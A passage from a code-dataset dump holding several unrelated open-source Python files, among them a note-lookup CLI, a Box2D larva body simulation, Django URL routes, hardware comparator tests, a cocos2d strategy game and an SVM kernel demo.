self.name = name\n self.filename = self.filename()\n self.path = self.path()\n\n def filename(self):\n \"\"\"\n Fetches the filename of the note based on its name.\n Prompts the user with options if there exists multiple\n notes with the same name.\n\n :return: note filename or error message\n \"\"\"\n notes = {}\n\n for file in os.listdir(self.directory):\n parts = file.split(\"-\")\n parts[len(parts) - 1] = parts[len(parts) - 1][:-3]\n notes[file] = \" \".join(parts[1:])\n\n if not self.duplicate_notes(notes):\n for id, name in notes.items():\n if name == self.name:\n return id\n else:\n click.secho(\n \"There exists more than one note with name: '{}'\".format(\n self.name),\n fg=\"yellow\",\n )\n for id, name in notes.items():\n if name == self.name:\n choice = input(\"Did you mean: {}? [y/n]: \".format(id))\n if choice == \"y\" or choice == \"Y\":\n return id\n\n Utils.display_error(\"Note not found.\", fg=\"red\")\n\n def duplicate_notes(self, notes):\n \"\"\"\n Checks if there exist duplicate notes in mindspace directory\n\n :param notes: notes dict\n :rtype: bool\n \"\"\"\n return list(notes.values()).count(self.name) > 1\n\n def path(self):\n \"\"\"\n Constructs the path based on the mindspace directory\n and filename\n\n :rtype: str or error\n \"\"\"\n path = os.path.join(self.directory, self.filename)\n\n if not os.path.exists(path):\n Utils.display_error(\"Note does not exist.\", \"red\")\n\n return os.path.join(self.directory, self.filename)\n","repo_name":"terror/mindspace","sub_path":"mindspace/note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"27304714504","text":"import Box2D\nimport numpy as np\nimport param\nfrom shapely import geometry\n\nfrom ... import aux, reg\nfrom . import LarvaSim\n\n__all__ = [\n 'BaseSegment',\n 'Box2DSegment',\n 'LarvaBox2D',\n]\n\n__displayname__ = 'Box2D larva'\n\n\nclass BaseSegment:\n \"\"\"\n Base segment of a larva.\n\n Args:\n pos (tuple): The position of the segment.\n orientation (float): The orientation of the segment.\n color (tuple): The color of the segment.\n base_seg_vertices (numpy.ndarray): The base segment vertices.\n base_seg_ratio (float): The base segment ratio.\n body_length (float): The length of the larva's body.\n\n \"\"\"\n\n __displayname__ = 'Body segment'\n\n def __init__(self, pos, orientation, color, base_seg_vertices, base_seg_ratio, body_length):\n self.color = color\n self.pos = pos\n self.orientation = orientation % (np.pi * 2)\n self.base_seg_vertices = base_seg_vertices\n self.base_local_rear_end = np.array([np.min(self.base_seg_vertices[:, 0]), 0])\n self.base_local_front_end = np.array([np.max(self.base_seg_vertices[:, 0]), 0])\n self.base_seg_ratio = base_seg_ratio\n self.body_length = body_length\n\n @property\n def seg_vertices(self):\n \"\"\"Get the vertices of the segment.\n\n Returns:\n numpy.ndarray:\n The vertices of the segment.\n \"\"\"\n return self.body_length * self.base_seg_vertices\n\n\nclass Box2DSegment(BaseSegment):\n \"\"\"\n Box2D-based segment of a larva.\n\n Args:\n space (Box2D.b2World): The Box2D world space.\n physics_pars (dict): Parameters related to the physics simulation.\n **kwargs (dict): Additional keyword arguments.\n\n\n Methods:\n vertices():\n Get the world coordinates of the segment's vertices.\n\n get_position():\n Get the world position of the segment.\n\n set_position(position):\n Set the world position of the segment.\n\n get_orientation():\n Get the orientation of the segment.\n\n set_orientation(orientation):\n Set the orientation of the segment.\n\n get_pose():\n Get the pose (position and orientation) of the segment.\n\n set_linearvelocity(lin_vel, local=False):\n Set the linear velocity of the segment.\n\n get_angularvelocity():\n Get the angular velocity of the segment.\n\n set_angularvelocity(ang_vel):\n Set the angular velocity of the segment.\n\n set_mass(mass):\n Set the mass of the segment.\n\n get_mass():\n Get the mass of the segment.\n\n get_world_point(point):\n Transform a local point to world coordinates.\n\n get_world_facing_axis():\n Get the world-facing axis of the segment.\n \"\"\"\n\n __displayname__ = 'Box2D body segment'\n\n def __init__(self, space, physics_pars, **kwargs):\n super().__init__(**kwargs)\n self._body: Box2D.b2Body = space.CreateDynamicBody(\n position=Box2D.b2Vec2(*self.pos),\n angle=self.orientation,\n linearVelocity=Box2D.b2Vec2(*[.0, .0]),\n angularVelocity=.0,\n bullet=True,\n linearDamping=physics_pars['lin_damping'],\n angularDamping=physics_pars['ang_damping'])\n\n for v in self.seg_vertices:\n self._body.CreatePolygonFixture(\n shape=Box2D.b2PolygonShape(vertices=v.tolist()),\n density=physics_pars['density'],\n friction=10,\n restitution=0,\n )\n\n self._fixtures = self._body.fixtures\n\n @property\n def vertices(self):\n \"\"\"\n Get the world coordinates of the segment's vertices.\n\n Returns\n -------\n numpy.ndarray\n The world coordinates of the segment's vertices.\n \"\"\"\n return np.array([[self.get_world_point(v) for v in vertices] for vertices in self.seg_vertices])\n\n def get_position(self):\n \"\"\"\n Get the world position of the segment.\n\n Returns\n -------\n numpy.ndarray\n The world position of the segment.\n \"\"\"\n pos = self._body.worldCenter\n return np.asarray(pos)\n\n def set_position(self, position):\n \"\"\"\n Set the world position of the segment.\n\n Parameters\n ----------\n position : tuple\n The new world position.\n \"\"\"\n self._body.position = position\n\n def get_orientation(self):\n \"\"\"\n Get the orientation of the segment.\n\n Returns\n -------\n float\n The orientation of the segment.\n \"\"\"\n return self._body.angle\n\n def set_orientation(self, orientation):\n \"\"\"\n Set the orientation of the segment.\n\n Parameters\n ----------\n orientation : float\n The new orientation of the segment.\n \"\"\"\n self._body.angle = orientation % (np.pi * 2)\n\n def get_pose(self):\n \"\"\"\n Get the pose (position and orientation) of the segment.\n\n Returns\n -------\n tuple\n The pose of the segment, including position and orientation.\n \"\"\"\n pos = np.asarray(self._body.position)\n return tuple((*pos, self._body.angle))\n\n def set_linearvelocity(self, lin_vel, local=False):\n \"\"\"\n Set the linear velocity of the segment.\n\n Parameters\n ----------\n lin_vel : tuple\n The new linear velocity.\n local : bool, optional\n Whether the linear velocity is in local coordinates. Defaults to False.\n \"\"\"\n if local:\n lin_vel = self._body.GetWorldVector(np.asarray(lin_vel))\n self._body.linearVelocity = Box2D.b2Vec2(lin_vel)\n\n def get_angularvelocity(self):\n \"\"\"\n Get the angular velocity of the segment.\n\n Returns\n -------\n float\n The angular velocity of the segment.\n \"\"\"\n return self._body.angularVelocity\n\n def set_angularvelocity(self, ang_vel):\n \"\"\"\n Set the angular velocity of the segment.\n\n Parameters\n ----------\n ang_vel : float\n The new angular velocity of the segment.\n \"\"\"\n self._body.angularVelocity = ang_vel\n\n def set_mass(self, mass):\n \"\"\"\n Set the mass of the segment.\n\n Parameters\n ----------\n mass : float\n The new mass of the segment.\n \"\"\"\n self._body.mass = mass\n\n def get_mass(self):\n \"\"\"\n Get the mass of the segment.\n\n Returns\n -------\n float\n The mass of the segment.\n \"\"\"\n return self._body.mass\n\n def get_world_point(self, point):\n \"\"\"\n Transform a local point to world coordinates.\n\n Parameters\n ----------\n point : tuple\n The local point coordinates.\n\n Returns\n -------\n numpy.ndarray\n The world coordinates of the point.\n \"\"\"\n return self._body.GetWorldPoint(np.asarray(point))\n\n def get_world_facing_axis(self):\n \"\"\"\n Get the world-facing axis of the segment.\n\n Returns\n -------\n numpy.ndarray\n The world-facing axis of the segment.\n \"\"\"\n return np.asarray(self._body.GetWorldVector(Box2D.b2Vec2(1.0, 0.0)))\n\n\nclass LarvaBox2D(LarvaSim):\n \"\"\"\n Box2D-based larva simulation.\n \"\"\"\n\n __displayname__ = 'Box2D larva'\n\n segs = param.List(item_type=Box2DSegment, doc='The body segments.')\n\n def __init__(self, Box2D, **kwargs):\n self.Box2D_params = Box2D\n super().__init__(**kwargs)\n\n def generate_segs(self):\n \"\"\"\n Generate the segments of the larva.\n \"\"\"\n kws = {\n 'physics_pars': {\n 'density': self.density,\n 'lin_damping': self.lin_damping,\n 'ang_damping': self.ang_damping,\n 'inertia': 0.0\n },\n 'space': self.model.space,\n }\n\n self.segs = aux.ItemList(objs=self.Nsegs, cls=self.param.segs.item_type, pos=self.seg_positions,\n orientation=self.orientation,\n base_vertices=self.base_seg_vertices,\n length=(self.length * self.segment_ratio).tolist(), **kws)\n\n if self.model.larva_collisions:\n for seg in self.segs:\n for fixture in seg._fixtures:\n fixture.filterData.groupIndex = -1\n\n self.joints = []\n\n if self.Nsegs > 1:\n self.create_joints(self.Nsegs, self.segs, joint_types=self.Box2D_params['joint_types'])\n\n def prepare_motion(self, lin, ang):\n \"\"\"\n Prepare the larva for motion with given linear and angular velocities.\n\n Parameters\n ----------\n lin : float\n Linear velocity.\n ang : float\n Angular velocity.\n \"\"\"\n\n if self.ang_mode == 'velocity':\n ang_vel = ang * self.ang_vel_coef\n self.segs[0].set_angularvelocity(ang_vel)\n if self.Nsegs > 1:\n for i in np.arange(1, int(self.Nsegs / 2), 1):\n self.segs[i].set_angularvelocity(ang_vel / i)\n elif self.ang_mode == 'torque':\n self.segs[0]._body.ApplyTorque(ang * self.torque_coef, wake=True)\n\n # Linear component\n # Option : Apply to single body segment\n # We get the orientation of the front segment and compute the linear vector\n # target_segment = self.get_head()\n # lin_vec = self.compute_new_lin_vel_vector(target_segment)\n #\n # # From web : Impulse = Force x 1 Sec in Box2D\n # if self.mode == 'impulse':\n # imp = lin_vec / target_segment.get_Box2D_mass()\n # target_segment._body.ApplyLinearImpulse(imp, target_segment._body.worldCenter, wake=True)\n # elif self.mode == 'force':\n # target_segment._body.ApplyForceToCenter(lin_vec, wake=True)\n # elif self.mode == 'velocity':\n # # lin_vec = lin_vec * target_segment.get_Box2D_mass()\n # # Use this with gaussian crawler\n # # target_segment.set_lin_vel(lin_vec * self.lin_coef, local=False)\n # # Use this with square crawler\n # target_segment.set_lin_vel(lin_vec, local=False)\n # # pass\n\n # Option : Apply to all body segments. This allows to control velocity for any Npoints. But it has the same shitty visualization as all options\n # for seg in [self.segs[0]]:\n for seg in self.segs:\n l = lin * seg.get_world_facing_axis()\n if self.lin_mode == 'impulse':\n seg._body.ApplyLinearImpulse(l * self.lin_vel_coef / seg.get_mass(), seg._body.worldCenter, wake=True)\n elif self.lin_mode == 'force':\n seg._body.ApplyForceToCenter(l * self.lin_force_coef, wake=True)\n elif self.lin_mode == 'velocity':\n seg.set_linearvelocity(l * self.lin_vel_coef, local=False)\n\n def updated_by_Box2D(self):\n \"\"\"\n Update the larva simulation based on Box2D physics.\n \"\"\"\n\n self.set_position(tuple(self.global_midspine_of_body))\n self.trajectory.append(self.get_position())\n\n self.dst = geometry.Point(self.pos).distance(geometry.Point(self.trajectory[-1]))\n # self.dst = aux.eudis5(self.pos, self.trajectory[-1])\n self.cum_dst += self.dst\n self.compute_body_bend()\n\n # To make peristalsis visible we try to leave some space between the segments.\n # We define an interval proportional to the length : int*l.\n # We subtract it from the front end of all segments except the first and from the rear end of all segments except the last.\n # For Npoints=n, in total we subtract 2*(n-1)*int*l in length.\n # For width_to_length_ratio=w2l, the area of the body without intervals is A=w2l*l*l\n # Subtracting the intervals, this translates to A'= (l-2*(n-1)*int*l) * w2l*l = (1-2*(n-1)*int)*A\n # To get the same mass, we will raise the density=d to d' accordingly : mass=d*A = d'*A' ==> d'=d/(1-2*(n-1)*int)\n # def add_interval_between_segments(self, Nsegs, density, interval, seg_starts, seg_stops):\n # for i in range(1, len(seg_starts)):\n # seg_starts[i] -= interval\n # for i in range(len(seg_stops) - 1):\n # seg_stops[i] += interval\n #\n # self.density = density / (1 - 2 * (Nsegs - 1) * interval)\n #\n # return seg_starts, seg_stops\n\n def create_joints(self, Nsegs, segs, joint_types=None):\n \"\"\"\n Create joints to connect the segments of the larva.\n\n Parameters\n ----------\n Nsegs : int\n The number of segments in the larva.\n segs : list of Box2DSegment\n The list of Box2DSegment objects representing the larva segments.\n joint_types : dict, optional\n A dictionary specifying the types of joints to create. The dictionary should contain keys for different\n joint types ('distance', 'revolute', 'friction') and values specifying the number of joints of each type\n to create ('N') and the joint parameters ('args') for each type.\n\n Notes\n -----\n The `joint_types` parameter is optional and, if not provided, it will use the joint types and parameters\n defined in the `Box2D` attribute of the larva simulation.\n\n This method creates various types of joints (distance, revolute, and friction) to connect the segments of the\n larva together in a physically realistic way.\n\n \"\"\"\n\n if joint_types is None:\n joint_types = aux.AttrDict({'friction': {'N': 0,\n 'args': {'maxForce': {'v': 1, 'lim': (0.0, 100000)},\n 'maxTorque': {'v': 1, 'lim': (0.0, 100000)}}},\n 'revolute': {'N': 0,\n 'args': {'enableMotor': True,\n 'maxMotorTorque': {'v': 0.0, 'lim': (0.0, 100000)},\n 'motorSpeed': {'v': 0.0, 'lim': (0.0, 100000)}}},\n 'distance': {'N': 0,\n 'args': {'frequencyHz': {'v': 5.0, 'lim': (0.0, 100000)},\n 'dampingRatio': {'v': 1.0, 'lim': (0.0, 100000)}}}})\n space = self.model.space\n l0 = self.sim_length / self.Nsegs\n\n # TODO Find compatible parameters.\n # Until now for the 12-seg body : density 30000 and maxForce 100000000 and torque_coef 3.5 seem to work for natural bend\n # Trying to implement friction joint\n # if joint_types is None :\n # joint_types = {'distance': 0, 'revolute': 0, 'friction' : 0}\n for i in range(Nsegs):\n if i == 0:\n continue\n # if joint_types['friction']\n # friction_pars = {'maxForce': 10 ** 0, 'maxTorque': 10 ** 1}\n if joint_types['friction']['N'] == 2:\n xAs = [-0.5, 0.5]\n elif joint_types['friction']['N'] == 1:\n xAs = [0]\n else:\n xAs = []\n for xA in xAs:\n friction_joint = space.CreateFrictionJoint(**joint_types['friction']['args'],\n bodyA=segs[i]._body,\n bodyB=self.model.friction_body,\n localAnchorA=(xA, 0),\n localAnchorB=(0, 0))\n\n self.joints.append(friction_joint)\n\n # For many segments, the front one(sigma) will be joint by points outside the body.\n # So we adopt a more conservative solution, bringing the attachment point more medially : No visible difference\n # lateral_attachment_dist = self.width_to_length_ratio * self.Npoints / 4\n\n dist_joint_def = {'collideConnected': False,\n # 'frequencyHz': 5,\n # 'dampingRatio': 1,\n 'length': l0 * 0.01}\n joint_types['distance']['args'].update(dist_joint_def)\n w = self.width_to_length_ratio * Nsegs / 2\n\n for i in range(Nsegs - 1):\n weld_def = {\n 'dampingRatio': 0.1,\n 'referenceAngle': 0,\n 'frequencyHz': 2000\n }\n A, B = segs[i]._body, segs[i + 1]._body\n # if joint_types['distance']['N'] == 2:\n\n space.CreateWeldJoint(**weld_def,\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, w)),\n localAnchorB=tuple(l0 * x for x in (0.5, w))\n\n )\n # space.CreateWeldJoint(**weld_def,\n # bodyA=A, bodyB=B,\n # localAnchorA=tuple(l0 * x for x in (-0.5, -w)),\n # localAnchorB=tuple(l0 * x for x in (0.5, -w)))\n\n for i in range(Nsegs - 1):\n A, B = segs[i]._body, segs[i + 1]._body\n if joint_types['distance']['N'] == 2:\n j_l = space.CreateDistanceJoint(**joint_types['distance']['args'],\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, w)),\n localAnchorB=tuple(l0 * x for x in (0.5, w)))\n j_r = space.CreateDistanceJoint(**dist_joint_def,\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, -w)),\n localAnchorB=tuple(l0 * x for x in (0.5, -w)))\n self.joints.append([j_l, j_r])\n elif joint_types['distance']['N'] == 1:\n j = space.CreateDistanceJoint(**dist_joint_def,\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, 0)),\n localAnchorB=tuple(l0 * x for x in (0.5, 0)))\n self.joints.append(j)\n\n if joint_types['revolute']:\n\n rev_joint_def = {'collideConnected': False,\n 'referenceAngle': 0,\n 'enableLimit': True,\n 'lowerAngle': -0.9 * (np.pi * 2) / (Nsegs - 1),\n 'upperAngle': 0.9 * (np.pi * 2) / (Nsegs - 1),\n # 'enableMotor': True, # )\n # 'maxMotorTorque': 1.0,\n # 'motorSpeed': 1\n }\n joint_types['revolute']['args'].update(rev_joint_def)\n for i in range(Nsegs - 1):\n A, B = segs[i]._body, segs[i + 1]._body\n if joint_types['revolute']['N'] == 2:\n j_l = space.CreateRevoluteJoint(**joint_types['revolute']['args'],\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, w)),\n localAnchorB=tuple(l0 * x for x in (0.5, w)))\n j_r = space.CreateRevoluteJoint(**rev_joint_def,\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, -w)),\n localAnchorB=tuple(l0 * x for x in (0.5, -w)))\n self.joints.append([j_l, j_r])\n elif joint_types['revolute']['N'] == 1:\n j = space.CreateRevoluteJoint(**rev_joint_def,\n bodyA=A,\n bodyB=B,\n localAnchorA=tuple(l0 * x for x in (-0.5, 0)),\n localAnchorB=tuple(l0 * x for x in (0.5, 0)))\n self.joints.append(j)\n","repo_name":"bagjohn/larvaworld_autoversioning","sub_path":"src/larvaworld/lib/model/agents/_larva_box2d.py","file_name":"_larva_box2d.py","file_ext":"py","file_size_in_byte":21003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43546617037","text":"from Mahasiswa import Mahasiswa\n\ndata = Mahasiswa()\n\nprint(\"Input\")\nnama = str(input(\"Nama : \"))\nnim = str(input(\"NIM : \"))\nprodi = str(input(\"Program Studi : \"))\nfakultas = str(input(\"Fakultas: \"))\n\nprint(\"\\nData\")\ndata.setNama(nama)\ndata.setNim(nim)\ndata.setProdi(prodi)\ndata.setFakultas(fakultas)\ndata.printHasil()","repo_name":"MuhammadFahru/LATIHAN1DPBO2023","sub_path":"Python/Program/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74779235071","text":"a = input().lower().split()\nqwe = []\nfor item in a:\n last = \";\"\n for i in item:\n if last.isalpha() and i.isalpha() and (last + i) not in qwe:\n qwe.append(last + i)\n last = i\nprint(len(qwe))\n\n","repo_name":"Disfavour/pythonprac","sub_path":"20201015_1/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41301094084","text":"\"\"\"\n 冬季来临,请设计一个有固定加热半径的供暖器向所有房屋供暖\n 在加热器的加热半径范围内的每个房屋都可以获得供暖\n 现在,给出位于一条水平线上的房屋houses和供暖器heaters 的位置,找出并返回可以覆盖所有房屋的最小加热半径\n example 1:\n 输入: houses = [1,2,3], heaters = [2]\n 输出: 1\n example 2:\n 输入: houses = [1,2,3,4], heaters = [1,4]\n 输出: 1\n example 3:\n 输入: houses = [1,5], heaters = [2]\n 输出: 3\n\"\"\"\nfrom typing import List\n\n\n# 找到每个房屋前一个加热器,和后一个加热器,取距离最近的值\n# 使用指针pointer_previous和pointer_next,分别指向前一个加热器,和后一个加热器\n# 此时所有房屋的距离最大值就是目标半径\n# 当只有一个加热器的时候,直接计算后返回即可\ndef heaters(houses: List[int], heaters: List[int]) -> int:\n result = []\n if len(heaters) == 1:\n for item in houses:\n result.append(abs(item - heaters[0]))\n return max(result)\n houses.sort()\n heaters.sort()\n pointer_previous, pointer_next = 0, 1\n for house in houses:\n while pointer_next < len(heaters) - 1 and heaters[pointer_next] < house:\n pointer_next += 1\n pointer_previous += 1\n result.append(min(abs(house - heaters[pointer_previous]), abs(heaters[pointer_next] - house)))\n return max(result)\n\n\nif __name__ == '__main__':\n print(heaters(houses=[1, 2, 3], heaters=[2]))\n print(heaters(houses=[1, 2, 3, 4], heaters=[1, 4]))\n print(heaters(houses=[1, 5], heaters=[2]))\n","repo_name":"zexiangzhang/algorithmAndDataStructure","sub_path":"algorithm/double_pointer/segmented_double_pointer/heaters.py","file_name":"heaters.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"14277596119","text":"from pathlib import Path\n\nfrom src.event.base import Base\n\n\nclass File(Base):\n def __init__(self, modified_time, file_event_type: str, file_name: Path, diff: list):\n super().__init__(modified_time)\n self.file_event_type = file_event_type\n self.file_name = file_name\n self.diff = diff\n\n def __str__(self):\n representation = super().__str__() + '\\n'\n representation += 'file_event_type: ' + self.file_event_type + '\\n'\n representation += 'file_name: ' + str(self.file_name) + '\\n'\n representation += 'diff: ' + str(self.diff) + '\\n'\n return representation\n","repo_name":"KaimaneKaimane/eventbroker","sub_path":"src/event/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17533948714","text":"from django.conf.urls import url\nfrom . import views \napp_name = 'game' \n\nurlpatterns = [\n url(r'^computer/(?P\\d+)$', views.index, name='index'), \n url(r'^/reloadDiv$', views.reload, name='reloadDiv'), \n url(r'^/incermentTurn$', views.incermentTurn, name='incermentTurn'), \n url(r'^player1/(?P\\d+)$', views.multiplayer, name='multiplayer'),\n url(r'^player2/(?P\\d+)$', views.player2, name='player2'),\n url(r'^update$', views.update, name='update'),\n url(r'^update1$', views.update1, name='update1')\n]","repo_name":"Shawnpcw/Math-Tic-Tac-Toe","sub_path":"apps/game/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33599056422","text":"import pytest\nimport magma\nfrom magma import compile\nfrom magma.testing import check_files_equal\nfrom mantle.lattice.mantle40.compare import \\\n DefineEQ, DefineNE, \\\n DefineUGE, DefineULE, DefineUGT, DefineULT, \\\n DefineSGE, DefineSLE, DefineSGT, DefineSLT\nfrom fault.test_vectors import generate_function_test_vectors, \\\n generate_simulator_test_vectors\n\nwidth = 2\nmask = 2**width-1\n\ndef sim(Test, TestFun):\n tvsim = generate_simulator_test_vectors(Test)\n tvfun = generate_function_test_vectors(Test, TestFun)\n assert tvsim == tvfun\n\ndef com(Test, name):\n name = 'test_{}'.format(name)\n build = 'build/' + name\n gold = 'gold/' + name\n compile(build, Test)\n assert check_files_equal(__file__, build+'.v', gold+'.v')\n\n\ndef test_eq():\n Test = DefineEQ(width)\n sim( Test, lambda x, y: int(x == y) )\n com( Test, 'eq{}'.format(width) )\n\ndef test_ne():\n Test = DefineNE(width)\n sim( Test, lambda x, y: int(x != y) )\n com( Test, 'ne{}'.format(width) )\n\n\ndef test_uge():\n Test = DefineUGE(width)\n sim( Test, lambda x, y: int(x >= y) )\n com( Test, 'uge{}'.format(width) )\n\ndef test_ule():\n Test = DefineULE(width)\n sim( Test, lambda x, y: int(x <= y) )\n com( Test, 'ule{}'.format(width) )\n\ndef test_ugt():\n Test = DefineUGT(width)\n sim( Test, lambda x, y: int(x > y) )\n com( Test, 'ugt{}'.format(width) )\n\ndef test_ult():\n Test = DefineULT(width)\n sim( Test, lambda x, y: int(x < y) )\n com( Test, 'ult{}'.format(width) )\n\n\ndef test_sge():\n Test = DefineSGE(width)\n print(Test.interface)\n sim( Test, lambda x, y: int(x >= y) )\n com( Test, 'sge{}'.format(width) )\n\ndef test_sle():\n Test = DefineSLE(width)\n sim( Test, lambda x, y: int(x <= y) )\n com( Test, 'sle{}'.format(width) )\n\ndef test_sgt():\n Test = DefineSGT(width)\n sim( Test, lambda x, y: int(x > y) )\n com( Test, 'sgt{}'.format(width) )\n\ndef test_slt():\n Test = DefineSLT(width)\n sim( Test, lambda x, y: int(x < y) )\n com( Test, 'slt{}'.format(width) )\n\n","repo_name":"akeley98/mantle","sub_path":"tests/test_mantle40/test_compare.py","file_name":"test_compare.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"30798938744","text":"#This file is part of linkrease.\n\n#linkrease is free software: you can redistribute it and/or modify\n#it under the terms of the GNU General Public License as published by\n#the Free Software Foundation, either version 3 of the License, or\n#(at your option) any later version.\n\n#linkrease is distributed in the hope that it will be useful,\n#but WITHOUT ANY WARRANTY; without even the implied warranty of\n#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n#GNU General Public License for more details.\n\n#You should have received a copy of the GNU General Public License\n#along with linkrease. If not, see .\n\nimport pyglet\n\nimport cocos\nfrom cocos.actions import *\nfrom cocos.scenes import *\nfrom cocos.director import director\n\nimport settings\nimport levels\nimport layers\n\nfrom multiplayer import current_player\n\n\nclass IntroScene(cocos.scene.Scene):\n def __init__(self):\n super(IntroScene, self).__init__()\n\n # create layers\n colour_data = settings.COLOUR_DATA['intro']\n bg_layer = cocos.layer.ColorLayer(*colour_data['background'])\n text_layer = cocos.layer.Layer()\n\n # create label\n name_label = cocos.text.Label(\n \"Presenting CWD's\",\n font_name='Courier New',\n font_size=40,\n anchor_x='center',\n anchor_y='center',\n color=colour_data['text'],\n position=(settings.SCR_MID_X, settings.SCR_MID_Y),\n )\n name_label.opacity = 0\n\n #add label to layer\n text_layer.add(name_label)\n\n #add layers to scene\n self.add(bg_layer)\n self.add(text_layer)\n\n #text layer actions\n name_label.do(\n Accelerate(FadeIn(4), rate=2) +\n Delay(1) +\n FadeOut(2) +\n CallFunc(self.on_end_intro) # called when animations are finished\n )\n\n def on_end_intro(self):\n director.replace(FadeTransition(MenuScene(), duration=1))\n\n\nclass MenuScene(cocos.scene.Scene):\n def __init__(self):\n super(MenuScene, self).__init__()\n colour_data = settings.COLOUR_DATA['menu']\n self.bg_layer = cocos.layer.ColorLayer(*colour_data['background'])\n self.add(self.bg_layer)\n self.add(MainMenu())\n\n\nclass MainMenu(cocos.menu.Menu):\n def __init__(self, title='LINKREASE'):\n super(MainMenu, self).__init__(title=title)\n self.font_title['font_name'] = 'Courier New'\n self.font_title['font_size'] = 60\n self.font_item['font_name'] = 'Courier New'\n self.font_item['font_size'] = 30\n self.font_item_selected['font_name'] = 'Courier New'\n self.font_item_selected['font_size'] = 30\n\n items = [\n cocos.menu.MenuItem('New Game', self.on_new_game),\n cocos.menu.MenuItem('Options', self.on_options),\n cocos.menu.MenuItem('Quit', pyglet.app.exit),\n ]\n\n self.create_menu(items, cocos.menu.zoom_in(), cocos.menu.zoom_out())\n\n def on_new_game(self):\n director.replace(FadeTransition(GameScene(), duration=1))\n\n def on_options(self):\n pass\n\n def on_quit(self):\n pass\n\n\nclass GameLayerController(cocos.layer.scrolling.ScrollingManager):\n is_event_handler = True\n\n def __init__(self, map):\n super(GameLayerController, self).__init__()\n self.scale = settings.ZOOM_MIN\n\n #store model\n self.map = map\n\n #create view\n self.map_view = layers.MapView(map)\n self.add(self.map_view)\n\n #add callback to model\n self.map.add_listener(self.on_model_change)\n self.map.add_fleet_listener(self.on_fleet_launched)\n\n def on_mouse_press(self, x, y, buttons, modifiers):\n px, py = self.map_view.map_from_pixel(*self.pixel_from_screen(x, y))\n n = self.map.closest_node_to(px, py)\n player = current_player()\n if self.map.get_owner(n) is player:\n self.map.select_node(player, n)\n\n def on_mouse_release(self, x, y, buttons, modifiers):\n player = current_player()\n source = self.map.selected_node(player)\n target = self.map.targeted_node(player)\n if source is not None and source is not target:\n player = current_player()\n self.map.move_units_to_target(player)\n self.map.select_node(player, None)\n\n def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):\n player = current_player()\n if self.map.selected_node(player) is not None:\n px, py = self.map_view.map_from_pixel(*self.pixel_from_screen(x, y))\n n = self.map.closest_node_to(px, py)\n self.map.target_node(player, n)\n\n def on_mouse_scroll(self, x, y, dx, dy):\n \"\"\"\n Zoom on mouse scroll.\n\n x, y: position of mouse on screen\n dx: horizontal scroll value\n dy: vertical scroll value\n \"\"\"\n #calculate next scale value\n scale = self.scale + (settings.ZOOM_STEP * dy)\n\n #restrict to bounds\n if scale < settings.ZOOM_MIN:\n scale = settings.ZOOM_MIN\n elif scale > settings.ZOOM_MAX:\n scale = settings.ZOOM_MAX\n\n if scale != self.scale:\n #set scale\n self.scale = scale\n px, py = self.pixel_from_screen(x, y)\n #set centre point\n self.set_focus(px, py)\n\n def on_model_change(self):\n self.map_view.on_model_change()\n\n def on_fleet_launched(self, fleet):\n fleet.add_arrival_listener(self.on_fleet_arrived)\n self.schedule(fleet.step_time)\n\n def on_fleet_arrived(self, fleet):\n self.map.deploy(fleet.get_target(), fleet.get_num_units(), fleet.get_owner())\n self.unschedule(fleet.step_time)\n\n\nclass GameScene(cocos.scene.Scene):\n def __init__(self, graph=None, player_start=[0]):\n super(GameScene, self).__init__()\n\n if graph:\n self.G = graph\n else:\n self.G = levels.generate_random_level()\n\n #add scrolling manager\n self.game_layer_controller = GameLayerController(self.G)\n self.add(self.game_layer_controller)\n\n #add base_layer\n self.base_layer = cocos.layer.ColorLayer(*settings.COLOUR_DATA['game']['background'])\n self.add(self.base_layer)\n","repo_name":"meshy/linkrease","sub_path":"linkrease/scenes.py","file_name":"scenes.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"44475256426","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.datasets import make_moons\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import PolynomialFeatures, StandardScaler\nfrom sklearn.svm import SVC\n\n# 对比不同核函数\n\nX, y = make_moons(n_samples=100, noise=0.15, random_state=42)\n\n# 对两个不同维度svm进行对比\n\npoly_kernal_svm_clf = Pipeline([\n (\"scaler\", StandardScaler()),\n (\"svm_clf\", SVC(kernel=\"poly\", degree=3, coef0=1, C=5))\n])\n\npoly100_kernal_svm_clf = Pipeline([\n (\"scaler\", StandardScaler()),\n (\"svm_clf\", SVC(kernel=\"poly\", degree=100, coef0=1, C=5))\n])\npoly_kernal_svm_clf.fit(X, y)\npoly100_kernal_svm_clf.fit(X, y)\n\n\n# 绘图\ndef plot_dataset(X, y, axes):\n plt.plot(X[:, 0][y == 0], X[:, 